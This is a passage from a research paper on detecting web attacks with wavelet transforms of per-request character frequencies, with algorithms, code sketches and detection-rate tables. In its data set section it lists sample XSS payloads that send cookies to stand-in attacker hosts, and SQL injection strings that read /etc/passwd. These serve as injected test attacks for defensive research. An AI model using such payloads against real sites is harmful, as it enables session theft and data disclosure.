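    dd = both_done[h:, h:]  # diagonal details
    return cc, cd, dc, dd

# Tiny invented 4x4 character-per-request window: one cell holds an outlier.
window = np.array([[2., 2., 2., 2.],
                   [1., 1., 9., 1.],
                   [0., 0., 0., 0.],
                   [3., 3., 3., 3.]])
cc, cd, dc, dd = haar2d_one_level(window)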

In the specific application that is the object of this paper, the comprehension of the bidimensional wavelet transform brings a complementary understanding of the possible attack behaviors, with respect to perturbations that affect not only neighbors in one single direction but the whole vicinity around the attack event. This was not noticed before, when only one-dimensional transforms were applied to the network data [14,25,36].

Figure 9a shows a representation of the coefficients stored in each of the four blocks of the 2D Haar wavelet transform after one decomposition level. The input matrix for this case corresponds to the same data used in Fig. 3, which does not contain attacks. In order to recover the data at the original resolution level, the inverse transform should be applied to the entire set of coefficients. If instead the information is to be kept at a coarser resolution, the inverse transform should be applied to block (cc) with all other blocks set to null values. But this is not the goal in the present work. No inverse transform will be applied, since the wavelet coefficients will be used only for the alarm generation. To improve the visualization, we show the values of the coefficients in absolute value. Figure 9b is the bidimensional representation of the four blocks, where the coefficient intensity is given by the color palette. Here, the location of the information in the matrix after the transformation is no longer related to the original positions in the input data matrix, but the original positions can always be recomputed.

Figure 10a represents the sets of coefficients of the bidimensional Haar wavelet transform for the data presented in Fig. 4, containing one Directory Traversal attack, and Fig. 10b shows the intensity of the coefficients through a bidimensional representation. Here, it is possible to observe the impact the attack caused on the magnitude of the wavelet coefficients in a very localized neighborhood. We show in circles the attack position in each block.

Fig. 9 TW2D of data presented in Fig. 3. a 3D representation of wavelet transform without attacks. b Same data in 2D view with the frequency intensity scale. Each block is labeled (cc, cd, dc and dd)

Fig. 10 TW2D of data presented in Fig. 4. a 3D representation of wavelet transform with 1 attack. b Same data in 2D view with the frequency intensity scale. The circles show the attack position in each block


4.3 Threshold operation

For a better understanding of the relevance of the complementary information contained in the wavelet coefficients, a threshold operation can be performed, making it possible to select the most significant wavelet coefficients and to discard irrelevant information. According to Donoho and Johnstone [8], this operation does not destroy the fundamental properties of the signal when the selection parameter (also called the threshold value) is chosen in a "proper way".

Therefore, a careful threshold process of timescale representations might be a promising tool to expose characteristics of anomalies within the data, since attacks indeed cause significant variations of the wavelet coefficients, as observed in Fig. 10a, b.

The design of a proper threshold is a fundamental issue for the alarm detection problem, as well as for any application involving compression, filtering or decision, since the efficiency of the wavelet detection system relies on the selection of the wavelet coefficients (details) of the wavelet series associated with invasive events. Recognizing the attack patterns is still an open question, which here is addressed through the threshold operations.

According to [8], the threshold operation consists in comparing the wavelet coefficients with a threshold value λ. Coefficients will then be modified according to some criterion, which can be more restrictive (hard thresholding, Eq. 1) or less restrictive (soft thresholding, Eq. 2). There are still other possible criteria, for example, the hyper threshold; for more specific information about this topic, the works of Donoho and Johnstone are suggested. The hard threshold keeps the significant coefficients unaltered, while the soft threshold tends to smooth the data, since even the significant coefficients are reduced by the threshold value. In this work, only hard thresholding will be explored in the alarm generation. According to Algorithm 2, the wavelet coefficients for the first decomposition level are stored in the second half of the vector C′, whose size is given by N = |C′|. For the 2D case, the same heuristic is considered, and after the application of the complete set of 1D transforms, the initial matrix will also be used to store the coefficients of the corresponding four blocks. Nevertheless, to simplify the nomenclature and the notation for the threshold operations, the wavelet coefficients of the three blocks cd, dc and dd are now treated as vectors and are denoted by d(k), with k = N/2 + 1, . . . , N, where N has to be set up according to the decomposition level.

– Hard threshold:

d(k) = 0       if |d(k)| < λ
d(k) = d(k)    if |d(k)| ≥ λ        (1)

– Soft threshold:

d(k) = 0           if |d(k)| < λ
d(k) = d(k) − λ    if |d(k)| ≥ λ and d(k) ≥ 0        (2)
d(k) = d(k) + λ    if |d(k)| ≥ λ and d(k) < 0

The selection of the threshold (or cutting) value is one of the most delicate stages of this design. A wrong determination may cause the failure of the detection process. For the numerical experiments, the cutting value will be initially determined following the universal threshold value proposed by Donoho and Johnstone [7]:

λ = σ · √(2 log N),        (3)

where N for the 1D case is the initial size of the vector before the wavelet transform is applied. In the 2D case, N is the size of the original matrix. In Eq. (3), σ is the standard deviation, computed from all wavelet coefficients after all decomposition levels were obtained.

After applying the threshold operation to the wavelet coefficients, a set of modified coefficients is then obtained. If the information in the time domain has to be reconstructed, it is necessary to apply the inverse wavelet transform, providing the corresponding filtered data. For the applications considered in this paper, the inverse transform will not be executed, and the alarm generation will be performed right after the threshold operation, considering the hard threshold strategy.
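The sketch below computes the universal threshold of Eq. (3) and applies the hard thresholding of Eq. (1) to one set of wavelet coefficients; taking σ as the standard deviation of the coefficients passed in and N as their number is a simplifying assumption of this sketch, and the sample coefficients are invented.

import numpy as np

def universal_threshold(details):
    # Universal threshold of Eq. (3): lambda = sigma * sqrt(2 log N), with
    # sigma and N taken here from the coefficients passed in.
    details = np.asarray(details, dtype=float)
    return details.std() * np.sqrt(2.0 * np.log(details.size))

def hard_threshold(details, lam):
    # Hard thresholding of Eq. (1): coefficients below lambda in magnitude
    # are set to zero; the remaining ones are kept unaltered.
    details = np.asarray(details, dtype=float)
    return np.where(np.abs(details) < lam, 0.0, details)

# Invented wavelet coefficients of one block: only the two spikes survive.
d = np.array([0.1, -0.3, 4.2, 0.05, -0.2, 3.8, 0.0, -0.15])
lam = universal_threshold(d)
print(lam, hard_threshold(d, lam))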

4.4 Best approximation

The best approximation operation sorts the entire set of wavelet coefficients generated by the wavelet transform and chooses those with the largest magnitude [39]. The selection of the most representative wavelet coefficients from the entire transformation produces a new series of coefficients, whose result after the inverse transform is a close approximation to the original data. With this approach, the number of wavelet coefficients used in the analysis can be reduced significantly. Algorithm 3 presents the pseudocode of the best approximation operation. Considering the vector C containing just one level of the wavelet transform, the scaling coefficients are stored in the first half of vector C and the wavelet coefficients are stored in its second half. The other parameter of the algorithm is NB, the number of coefficients that will be kept after the sort. That is, the NB wavelet coefficients with the largest magnitude are selected.

Algorithm 3: Best approximation operation
input : C : Array of data
input : NB : Number of best coefficients desired
output: C′ : Array of data
1   N ← |C|
    // Ordering C in decreasing order of wavelet coefficient magnitude
2   for i ← 1 to N do
3       I[i] ← i
4   end
5   Sort(I) s.t. |C[I_k]| ≥ |C[I_{k+1}]| for k = N/2 + 1 .. N
6   for i ← 1 to N/2 do
7       C′[i] ← C[i]
8       C′[N/2 + i] ← 0
9   end
    // Copying the NB best wavelet coefficients to the result array
10  for i ← N/2 + 1 to N/2 + NB do
11      C′[I[i]] ← C[I[i]]
12  end
13  return C′
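A minimal NumPy sketch of Algorithm 3 is given below; it keeps the scaling half untouched, zeroes the wavelet half and restores only the NB coefficients of largest magnitude. The sample vector is invented.

import numpy as np

def best_approximation(c, nb):
    # Algorithm 3 sketch: keep the scaling half of c (first N/2 entries) and,
    # among the wavelet coefficients (second half), keep only the nb of
    # largest magnitude; all other wavelet coefficients are set to zero.
    c = np.asarray(c, dtype=float)
    half = c.size // 2
    out = c.copy()
    out[half:] = 0.0
    details = c[half:]
    keep = np.argsort(np.abs(details))[::-1][:nb]  # indices of the nb largest
    out[half + keep] = details[keep]
    return out

# Invented one-level transformed row: scaling part first, wavelet part second.
c = np.array([5.0, 4.8, 5.1, 4.9, 0.1, -3.2, 0.05, 0.2])
print(best_approximation(c, nb=1))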

5 Wavelet-based algorithms for web intrusion detection

This section provides a description of the wavelet-based algorithms using one- and bidimensional wavelet transforms. The one-dimensional wavelet transform will be denoted as TW1D, and the bidimensional one as TW2D. Hard thresholding and the best approximation method will be combined with TW1D and TW2D as thresholding criteria.

5.1 TW1D and hard thresholding

The main issue in applying TW1D to the set of URL queries, with the input data organized as matrices as stated in this paper, is that although the data sets present an intrinsic bidimensional structure and interconnection, the unidimensional transform, whether applied per column or per row of the input matrix, is not able to capture the information variation in different directions. Consequently, the relation from one variable to the other in different directions is not taken into account throughout the unidimensional transform.

5.1.1 TW1D by rows

When the input data are analyzed by rows, each row containing the frequency distribution of one specific character throughout all requests, the TW1D captures all the significant variations of this distribution, also enabling the identification of the starting and ending points of the significant variations inside each row.

In Fig. 11, two examples of wavelet coefficients after one decomposition level are presented. The analyzed data are the same as presented in Fig. 4 (256 HTTP requests with one Directory Traversal attack). The analyzed rows in Case (a) and Case (b) correspond to the ASCII = 46 and ASCII = 73 characters, respectively. The marked dots are the identified attacks, obtained by the threshold operation for several threshold values. The values ρ · λ are all multiples (with constant factor ρ) of the initial universal threshold value [Eq. (3)]. It is important to observe that for each row, a different threshold value is obtained (λ computed for each row). Therefore, all significant coefficients remaining after the threshold operation are then associated with attacks.

This behavior indicates that simply analyzing the intensity variation of the wavelet coefficients is not enough for efficient attack detection. Another point is the fact that through the TW1D, no variations among lines can be verified at any stage of the analysis.

5.1.2 TW1D by columns

Considering now the TW1D applied by columns, each column will be associated with a specific request. Therefore, the input data for the transform will be the number of occurrences of each of the 256 ASCII characters for a fixed column. In addition, the threshold value is obtained for each column. In Fig. 12, the resulting wavelet coefficients for a one-level decomposition are presented for requests #3 and #28 of the data presented in Fig. 4.

Fig. 11 Detected attacks for threshold values ρ · λ. TW1D by row, considering the character distribution of (.) and (I) throughout the 256 requests of the data presented in Fig. 4 (with one Directory Traversal attack)

Fig. 12 Detected attacks for threshold values ρ · λ. TW1D by column for two requests (#3 and #28) in the window of data presented in Fig. 4


In Fig. 12, the detected attacks are represented by dots, and they are associated with requests where the variation in the number of characters was considered high (by the threshold operation). Similar to TW1D by rows, a huge number of false positives is obtained for some threshold values, followed by a sudden drop to no detection at all. This behavior indicates that either all single variations are being judged as attacks, or none of them serve as alarm sensors. This is caused by the lack of information to distinguish the variations caused by anomalous behaviors.

5.2 TW1D and best approximation

The first step of the best approximation strategy is the ordering of the entire set of wavelet coefficients in decreasing order. The second step consists in the selection of the first NB coefficients with the highest absolute values (according to Algorithm 3, these will be the most significant coefficients). The N − NB smaller coefficients are then discarded; that means their original values are assumed to be zero. The main issue here is the choice of the parameter NB; nevertheless, even for small NB the representation of the main variations in the signal is preserved.

When the TW1D is applied, whether by rows or by columns, the parameter NB for each row or column determines the number of detected attacks. The problem is that, with the attack sensor designed so far, an alarm is assigned every time a wavelet coefficient is labeled as significant, even when it is not related to a real attack. This observation leads to the need for complementary information in order to distinguish between two kinds of significant wavelet coefficients: those related to attacks and those related merely to strong local variations that still belong to the normal behavior of the system. This motivates the design of a second layer of analysis of the wavelet coefficients, which can be interpreted as a refinement step of the threshold operation. This issue is discussed in the next sections.
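As a concrete reading of this truncation step, the following minimal sketch keeps only the NB coefficients of largest magnitude and zeroes the remaining ones; names are illustrative and the snippet is not the authors' code.

    import numpy as np

    def best_approximation(d, nb):
        # Keep the nb coefficients of largest absolute value and zero the rest;
        # returns the truncated coefficients and the indices kept as significant.
        d = np.asarray(d, dtype=float)
        order = np.argsort(-np.abs(d))   # decreasing order of magnitude
        keep = order[:nb]
        truncated = np.zeros_like(d)
        truncated[keep] = d[keep]
        return truncated, keep

    # Example: from 128 detail coefficients, retain only the 5 strongest variations.
    d = np.random.randn(128)
    d_truncated, significant = best_approximation(d, nb=5)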

5.3 TW2D and hard thresholding

As stated in Sect. 4.2 and shown in Figs. 9 and 10, the TW2D generates a set of scaling coefficients, denoted by (cc), and three sets of wavelet coefficients, (cd), (dc) and (dd), all four blocks having dimension N/2 × N/2.
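A minimal sketch of this one-level decomposition (rows first, then columns) is given below. The pairing of the labels (cd) and (dc) with the row and column detail directions is an assumption made here for illustration, chosen so that (dc) captures differences among requests as described in Sect. 5.5; Sect. 4.2 itself is not reproduced in this sketch, and the function name is illustrative.

    import numpy as np

    def haar2d_level(m):
        # One level of the 2D Haar transform of an N x N matrix (N even):
        # transform along the rows first, then along the columns.
        m = np.asarray(m, dtype=float)
        a = (m[:, 0::2] + m[:, 1::2]) / np.sqrt(2.0)   # smooth across columns
        d = (m[:, 0::2] - m[:, 1::2]) / np.sqrt(2.0)   # detail across columns
        cc = (a[0::2, :] + a[1::2, :]) / np.sqrt(2.0)  # smooth in both directions
        cd = (a[0::2, :] - a[1::2, :]) / np.sqrt(2.0)  # detail across rows only (assumed naming)
        dc = (d[0::2, :] + d[1::2, :]) / np.sqrt(2.0)  # detail across columns only (assumed naming)
        dd = (d[0::2, :] - d[1::2, :]) / np.sqrt(2.0)  # detail in both directions
        return cc, dc, cd, dd

    # Example: decompose one 256 x 256 window into four 128 x 128 blocks.
    cc, dc, cd, dd = haar2d_level(np.random.poisson(2.0, size=(256, 256)))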

The attack sensor presented in this work is designed considering the thresholded wavelet coefficients, corresponding to the blocks (c̃d), (d̃c) and (d̃d). The first set of attack candidates comprises those positions associated with significant coefficients labeled by the thresholding operation.

The parameter ρ is a constant factor that corrects the universal threshold value [Eq. (3)] calculated over the corresponding block. The set of wavelet coefficients associated with anomalous variations (consequently judged as attacks) is composed of those elements labeled as significant in at least two different blocks of wavelet coefficients at the same time (line 6), that is, for the same indices i, j. This heuristic takes into account the impact that variations in a specific direction can cause in the others. Algorithm 4 presents the pseudocode for this heuristic.

5.4 TW2D and best approximation

In this approach, the core operation for attack detection is the best approximation method, which selects the NB wavelet coefficients of largest magnitude. The decision heuristic is similar to that of Algorithm 4. Each block is sorted in decreasing order, and the NB largest coefficients are labeled as significant.

Algorithm 4: Attack detection using TW2D + hard thresholding

input : M : matrix of data; ρ : constant factor of λ
output: A : set of attack positions

 1  A ← ∅
 2  (cc, dc, cd, dd) ← TW2D[M]          // one level
    // Attack candidates - 1st selection.
 3  c̃d ← Hard-Thresholding(cd, ρ)
    d̃c ← Hard-Thresholding(dc, ρ)
    d̃d ← Hard-Thresholding(dd, ρ)
    // Attack candidates - final selection.
 4  for i ← 1 to N/2 do
 5      for j ← 1 to N/2 do
            // Attack if at position (i, j) at least two thresholded blocks contain significant coefficients
 6          if (c̃d(i,j) > 0 ∧ d̃c(i,j) > 0) ∨ (c̃d(i,j) > 0 ∧ d̃d(i,j) > 0) ∨ (d̃c(i,j) > 0 ∧ d̃d(i,j) > 0) then
                // Attack detected, save the position
 7              A ← A + (i, j)
 8          end
 9      end
10  end
11  return A
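Read as code, the decision rule of Algorithm 4 can be sketched as below. The snippet assumes the three wavelet blocks are already available (for instance, from the haar2d_level sketch given earlier), uses the same MAD-based universal threshold assumed before, and treats "significant" as "surviving the hard threshold"; it is an illustrative sketch, not the authors' implementation.

    import numpy as np

    def hard_threshold(block, rho):
        # Zero every coefficient whose magnitude does not exceed rho times the
        # universal threshold of the block (sigma estimated via the MAD).
        block = np.asarray(block, dtype=float)
        sigma = np.median(np.abs(block)) / 0.6745
        lam = sigma * np.sqrt(2.0 * np.log(block.size))
        out = block.copy()
        out[np.abs(out) <= rho * lam] = 0.0
        return out

    def detect_attacks_tw2d_ht(cd, dc, dd, rho):
        # Algorithm 4 heuristic: flag position (i, j) when it carries a coefficient
        # surviving the threshold in at least two of the three wavelet blocks.
        surviving = [np.abs(hard_threshold(b, rho)) > 0 for b in (cd, dc, dd)]
        votes = surviving[0].astype(int) + surviving[1].astype(int) + surviving[2].astype(int)
        return list(zip(*np.where(votes >= 2)))

    # Example with blocks from the earlier sketch (rho = 5.0, the value that
    # performed best in the experiments of Sect. 6.4):
    # attacks = detect_attacks_tw2d_ht(cd, dc, dd, rho=5.0)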

The sensor classifies as attacks the events occurring at positions related to significant coefficients in at least two blocks of wavelet coefficients.

One observation here is that for small values of NB, a small number of false positives is obtained; however, when NB increases, the number of false positives also increases. This means that this heuristic is more sensitive to the choice of the parameter NB. This motivates the proposal of adding more layers of decision to the detection procedure, since the parameter NB alone cannot both control and decide which variations are indeed associated with attacks. With the aim of developing an alarm sensor involving the TW2D and the best approximation, we introduce a second refinement step for performing the attack classification. The next section addresses this issue.

5.5 TW2D, best approximation and refinement step

Algorithm 5 describes the application of the TW2D—best approximation method with one refinement criterion. The input of the algorithm is a data matrix organized according to Fig. 2 in Sect. 3. The output is a set of positions of HTTP requests detected as attacks. As discussed in Sect. 4, one level of the wavelet transform is performed, and the corresponding wavelet coefficients are stored in the blocks denoted by (dc), (cd) and (dd).

The main difference with respect to the previous algorithms is that in Algorithm 5, besides the first selection of the significant wavelet coefficients from the three blocks, two more steps are introduced in order to refine the set of wavelet coefficients assigned to attacks.


Algorithm 5: Attack detection using TW2D + best approximation + refinement

input : M : matrix of data
output: A : set of attack positions

 1  A ← ∅
 2  (cc, dc, cd, dd) ← TW2D[M]          // one level
    // Attack candidates - 1st selection:
    // Best Approx.: NB bigger wavelet coefficients
 3  Sort(cd) ← (d^cd_1, d^cd_2, .., d^cd_NB)  s.t. |d^cd_i| ≥ |d^cd_{i+1}|
 4  Sort(dc) ← (d^dc_1, d^dc_2, .., d^dc_NB)  s.t. |d^dc_i| ≥ |d^dc_{i+1}|
 5  Sort(dd) ← (d^dd_1, d^dd_2, .., d^dd_NB)  s.t. |d^dd_i| ≥ |d^dd_{i+1}|
    // Attack candidates - 2nd selection:
    // Just for the already chosen significant coefficients
 6  for i ← 1 to NB do
 7      η_i ← 0.1 · d^cd_i + 0.8 · d^dc_i + 0.1 · d^dd_i
 8      α ← 1.0
 9      if d^dc_i ≥ α · η_i then
            // Evaluate differences between details
10          μ^cd_i ← d^cd_i − d^cd_{i+1}
11          μ^dc_i ← d^dc_i − d^dc_{i+1}
12          μ^dd_i ← d^dd_i − d^dd_{i+1}
            // Weighted average of the detail differences
13          β ← 0.26
14          ε_i ← 0.25 · μ^cd_i + 0.50 · μ^dc_i + 0.25 · μ^dd_i
15          ρ_i ← max(μ^cd_i, μ^dc_i, μ^dd_i)
            // Attack detection - final selection
16          if ε_i ≥ β · ρ_i and the row and column of i coincide in at least two blocks then
                // Attack detected, save the position
17              A ← A + {i}
18          end
19      end
20  end
21  return A

This refinement step drastically increases the quality of the attack sensor, in the sense that the number of false-positive detections drops considerably, in a very robust and consistent way.

Similar to Algorithm 3 described in Sect. 5.4, the first selection criterion is the application of the best approximation method, and consequently the parameter NB is considered as an input. In the worst-case scenario, when the web application is the target of many attacks, the value of NB is higher, meaning that more coefficients are selected for the analysis. In the numerical tests, the maximum value considered was NB = N/2, corresponding to the choice of λ as the median of the wavelet coefficients. Another possible choice is NB = N/4, corresponding to the first quartile of all coefficients (in the statistical sense).

The second selection (starting at line 6 of Algorithm 5) filters the attack candidates selected so far. A convex weighted average of the details is computed, in which the block (dc) receives the largest weight. The block (dc) is more sensitive to the variations among requests, since it corresponds to differences in the horizontal direction, according to the data structure selected in Sect. 3. The proposed heuristic for designing the alarm sensor is to assume that only values of the privileged block (dc) greater than or equal to the weighted average are the next possible attack candidates.

Since the Haar wavelet coefficients are differences between two consecutive data values (multiplied by 1/√2), they are close to discrete derivatives (in the sense of finite differences); hence, variations between consecutive Haar wavelet coefficients can be seen as approximations of second derivatives of the analyzed data. Therefore, the final selection criterion considers the evaluation of differences among details from the three blocks, capturing strong variations in the sense of these "second derivative" approximations. These detail differences are used to compute a second weighted average, defined by a different set of weights, but the block (dc) remains the privileged one and again receives the largest weight in the convex combination. The selection test (line 16) then analyzes: (1) whether the variation of the variations of information at a specific point is larger than all variations around it, in all discrete directions defined by the wavelet blocks, and (2) whether this position is also a significant position for another wavelet block. Here, two new parameters are introduced, α and β, which are responsible for relaxing the values defined for the selection.
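The second selection can be sketched as follows, assuming as input the NB sorted coefficients of each block produced by lines 3–5 of Algorithm 5 and omitting the bookkeeping that maps ranks back to matrix positions (the two-block position test of line 16). The weights follow the listing above; all names and the example values are illustrative, not the authors' implementation.

    def refine_candidates(d_cd, d_dc, d_dd, alpha=1.0, beta=0.26):
        # Second selection of Algorithm 5 (sketch). Inputs are the NB largest
        # coefficients of each block, already sorted by decreasing magnitude.
        kept = []
        last = min(len(d_cd), len(d_dc), len(d_dd)) - 1   # index i+1 must exist
        for i in range(last):
            # Convex combination of the three details, privileging the (dc) block.
            eta = 0.1 * d_cd[i] + 0.8 * d_dc[i] + 0.1 * d_dd[i]
            if d_dc[i] >= alpha * eta:
                # Differences of consecutive details ("second derivative" proxies).
                mu_cd = d_cd[i] - d_cd[i + 1]
                mu_dc = d_dc[i] - d_dc[i + 1]
                mu_dd = d_dd[i] - d_dd[i + 1]
                eps = 0.25 * mu_cd + 0.50 * mu_dc + 0.25 * mu_dd
                if eps >= beta * max(mu_cd, mu_dc, mu_dd):
                    # Rank i is kept; Algorithm 5 additionally requires the
                    # corresponding position to be significant in at least two blocks.
                    kept.append(i)
        return kept

    # Example with three sorted coefficient sequences (illustrative values):
    print(refine_candidates([9.0, 2.0, 1.9], [8.5, 2.1, 2.0], [7.0, 1.5, 1.4]))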

5.6 TW2D, hard thresholding and refinement step

In order to demonstrate the robustness of the refinement step proposed in Algorithm 5, we replace the best approximation method by the hard threshold operation in the first step of candidate selection. All other steps of the algorithm remain unchanged. The results of applying this algorithm are discussed in Sect. 6.

6 Experiments and discussion

This section provides numerical experiments with two main goals in order to highlight the contribution of this manuscript: (1) to show some deficiencies of alarm generation based only on the one-dimensional wavelet transform and (2) to present and explore the potential of the bidimensional wavelet transform in designing efficient alarm generators. Figure 13 presents the organization scheme of the experiments. The one-dimensional wavelet transform is denoted as TW1D and the bidimensional one as TW2D. For both transforms, the hard thresholding and the best approximation operations are considered in the analysis.


Fig. 13 Design of the numerical experiments considering two selection techniques associated with the wavelet transforms

A preliminary study considering only the hard thresholding associated with the TW2D was presented by our group in [28]. In the current work, both the set of simulation cases and the analysis tools were extended in order to stress and enrich the discussion.

6.1 Data set for experiments

The so-labeled PFUNA data set was collected at the Polytechnic Faculty of the National University of Asunción, Paraguay. This data set contains web traffic information of a production web server. In this work, 3 months of data are analyzed, from January to March 2009, with the first day of collection being January 11 and the last day March 15. Therefore, the number of analysis days per month was 21, 28 and 22, respectively, totaling 71 days of collected traffic.

The web application chosen from the production web server is an application developed by PFUNA that offers several resources on its portal (www.pol.una.py). In Table 2, some statistics about queries to the web application are presented. The total number of HTTP requests contained in the analyzed data set is 59,248. This total was then translated into average numbers of queries per second, minute, hour and day. Through these statistics, the amount of queries arriving at the web application per second, minute, hour and day is estimated.

In order to validate the proposed methodology as an effective tool for analyzing realistic data sets, and to compute the number of correct attack detections, a synthetic data set was produced by removing the reported known attacks from the original one, here the PFUNA data set. In order to produce this kind of "attack-free" data, events considered as attacks were removed in two ways: manually, based on visual inspection, or through Snort [46], an IDS widely used in the scientific community for signature-based detection.

Table 2 Average amount of data from the PFUNA web applications

Month   Days   Queries   Query average by
                         Sec      Min      Hour      Day
1       21     11,563    0.006    0.382    22.942    550.619
2       28     29,965    0.012    0.743    44.590    1,070.178
3       22     17,720    0.009    0.559    33.560    805.454

Table 3 Attack distribution within the PFUNA data set

Case   Attacks   Quantity (window)
A      0         –
B      1         1 (1)
C      2         2 (1)
D      3         3 (1)
E      4         4 (1)
F      5         5 (1)
G      10        6 (1), 3 (2), 1 (3)
H      20        6 (1), 3 (2), 1 (3), 2 (19), 3 (20), 1 (23), 1 (25), 2 (28), 1 (31)

The quantity (window) column represents the number of attacks inserted in each window


The data set is divided into windows of 256 requests without attacks. The total number of processing windows is 232. As the total number of requests is 59,248, 144 null requests are introduced in the last window in order to keep the same window data structure.
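Under these assumptions about the data structure (rows indexed by the 256 ASCII codes, columns by the requests of the window, as in Fig. 2), one such window could be built as sketched below; the query strings shown are hypothetical and the function name is illustrative.

    import numpy as np

    def build_window(requests, size=256):
        # One analysis window: a 256 x size matrix whose entry (c, j) counts the
        # occurrences of ASCII character c in the j-th request; missing requests
        # are left as null (all-zero) columns, i.e. the padding described above.
        m = np.zeros((256, size))
        for j, req in enumerate(requests[:size]):
            for byte in req.encode("latin-1", errors="ignore"):
                m[byte, j] += 1
        return m

    # Example with two hypothetical query strings; the remaining columns stay
    # null, as in the padded last window of the data set.
    window = build_window(["id=10&name=abc", "page=2&lang=es"])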

The attacks of types A1 and A2 (see Table 1) were inserted into the PFUNA data set. Table 3 presents the chosen insertion distribution. The first column states the label of each numerical test executed in this section. The second column of Table 3 indicates the number of attacks inserted in the window. For example, in Case D, the value 3 (1) represents that 3 attacks were arbitrarily inserted in window 1.

The inserted attacks are Directory Traversal (A1), XSS (A2), SQL Injection (A1) and Code-Red (A1), and they were constructed as follows:

Directory Traversal attack, coded and not coded, with four to six injected attack strings "../". This increase over the usual character frequency is near the lowest value needed to reach the root directory.

XSS, coded and not coded, with special semantic characters such as {& < > ; ( ) ' : / *} varying from six to eight additional occurrences over the attack-free frequency. Below, three examples of injected XSS attacks are given.

Ex1) <script>document.location=’http://attackerhost.example/cgibin/cookiesteal.cgi?’+document.cookie</script>


Ex2) </SCRIPT>'>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Ex3) <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">

Table 4 True and false positives obtained applying the TW1D by rows

Attacks   No. of attacks detected for different ρλ
          1λ           1.5λ        2λ          2.5λ        3λ        3.5λ      4λ       5λ
          FP      TP   FP     TP   FP     TP   FP     TP   FP   TP   FP   TP   FP  TP   FP  TP
0         14,816  0    6,418  0    3,614  0    2,016  0    767  0    753  0    0   0    0   0
1         14,816  1    6,418  1    3,611  1    2,016  1    767  1    753  1    0   0    0   0
2         14,793  2    6,429  2    3,604  1    2,012  1    775  1    762  1    0   0    0   0
3         14,815  3    6,414  3    3,610  3    2,015  3    766  2    753  2    0   0    0   0
4         14,815  4    6,414  4    3,610  3    2,015  3    766  3    753  2    0   0    0   0
5         14,819  5    6,448  5    3,575  4    1,977  4    777  2    763  1    0   0    0   0
10        14,746  10   6,481  9    3,575  9    2,026  6    767  4    754  3    0   0    0   0
20        14,760  20   6,495  19   3,569  19   2,019  13   758  7    747  6    0   0    0   0

59,248 requests without attacks. Attack insertion: Cases A–H of Table 3

SQL Injection, coded and not coded, with special semantic characters such as { & < > ; ( ) ' : / * ' } injected in a quantity that exceeds the regular frequency by at least four to six times. Examples of injected SQLI attacks are presented below.

Ex1) %27/**/+union+/**/select /**/+1,2,3,version(),user(),6/**/--+

Ex2) /**/ utl_inaddr_get_host_name((select /**/ banner from v$version /**/ where rownum=1))--

Ex3) /**/+union+/**/select /**/NULL,LOAD_FILE(’////etc/////passwd’)/**/’

The last type of injected attack is Code-Red (I and II), with the character "N" or "X" repeated at least 200 times. The characters "N" and "X" are the typical signatures injected by Code-Red I and II, respectively.

The Directory Traversal and Code-Red attacks are variants constructed based on the attack database [15], which contains Code-Red (I and II), Directory Traversal (e.g., Nimda, Apache Win32 Directory Traversal) and Buffer Overflow attacks.

6.2 TW1D and hard thresholding

The main issue in applying the TW1D to the set of HTTP traffic data, organized as matrices as stated in this paper, is that although the data sets present an intrinsic bidimensional structure and interconnection, the unidimensional transform, whether applied per columns or per rows of the input matrix, is not able to capture information variation in different directions; consequently, the possible existing relations between one variable and the others are not taken into account by the unidimensional transforms.

6.2.1 TW1D-by row

The number of attacks detected according to the threshold value associated with hard thresholding is presented in Table 4. The set of simulations includes all 232 windows, with attacks inserted according to Table 3. For each threshold value, the number of wrongly detected attacks is computed as FP (false positives) and the number of correctly detected attacks as TP (true positives).

Based on the results of Table 4, it is possible to observe a huge amount of FP for almost all threshold values. There is a transition range of values between 3.5λ and 4λ where the number of false positives is minimized, and after that no false positives occur, at the price of no attack detection at all.

In fact, this range can be further subdivided, nevertheless keeping the same kind of pattern: either a large number of false positives, or no detection at all. This behavior indicates that simply analyzing the intensity variation of the wavelet coefficients is not enough for an efficient attack detection. Another point is that through the TW1D no variation among lines is considered at any stage of the analysis.

6.2.2 TW1D-by columns

Considering now the TW1D applied by columns, each column is associated with a specific request. Therefore, the input data for the transform are the occurrence numbers of each of the 256 ASCII characters for a fixed column. In addition, the threshold value is obtained for each column.


Table 5 True- and false-positive results applying the TW1D by columns

Attacks   No. of attacks detected for different ρλ
          1λ           1.5λ         2λ           2.5λ         3λ         3.5λ     4λ      5λ
          FP      TP   FP      TP   FP      TP   FP      TP   FP     TP  FP  TP   FP TP   FP TP
0         59,248  0    59,248  0    59,243  0    42,525  0    2,544  0   0   0    0  0    0  0
1         59,247  1    59,247  1    59,242  1    42,526  1    2,544  0   0   0    0  0    0  0
2         59,248  2    59,248  2    59,243  2    42,527  2    2,545  0   0   0    0  0    0  0
3         59,245  3    59,245  3    59,240  3    42,524  2    2,546  1   1   0    0  0    0  0
4         59,244  4    59,244  4    59,239  4    42,524  3    2,547  1   1   0    0  0    0  0
5         59,244  5    59,244  5    59,239  5    42,524  4    2,548  1   1   0    0  0    0  0
10        59,244  10   59,244  10   59,239  10   42,526  7    2,552  2   2   0    0  0    0  0
20        59,244  20   59,244  20   59,239  20   42,528  15   2,558  6   2   0    0  0    0  0

59,248 requests without attacks. Attack insertion: Cases A–H of Table 3

Table 6 True- and false-positive results for TW2D + hard thresholding

Attacks   No. of attacks detected for different ρλ
          1λ           1.5λ        2λ          2.5λ    3λ      3.5λ    4λ      5λ
          FP      TP   FP     TP   FP     TP   FP TP   FP TP   FP TP   FP TP   FP TP
0         15,971  0    4,452  0    1,939  0    14 0    7  0    2  0    1  0    0  0
1         15,970  1    4,451  1    1,934  1    15 1    8  1    3  1    2  1    0  1
2         15,969  2    4,451  2    1,934  2    14 2    7  2    2  2    1  2    0  2
3         15,911  3    4,447  3    1,934  3    14 3    7  2    3  3    1  3    0  3
4         15,909  4    4,447  4    1,934  4    14 4    7  4    2  4    1  4    0  4
5         15,887  5    4,387  5    1,874  5    28 5    3  5    1  5    1  5    0  5
10        15,774  10   4,308  10   1,940  10   15 10   7  10   2  10   1  10   0  10
20        15,420  20   4,107  20   1,876  20   16 20   3  20   1  20   1  20   0  20

PFUNA data set. 59,248 requests without attacks

The numerical results for the attack detection are presented in Table 5. Again, 232 windows are analyzed, with attacks inserted according to Table 3.

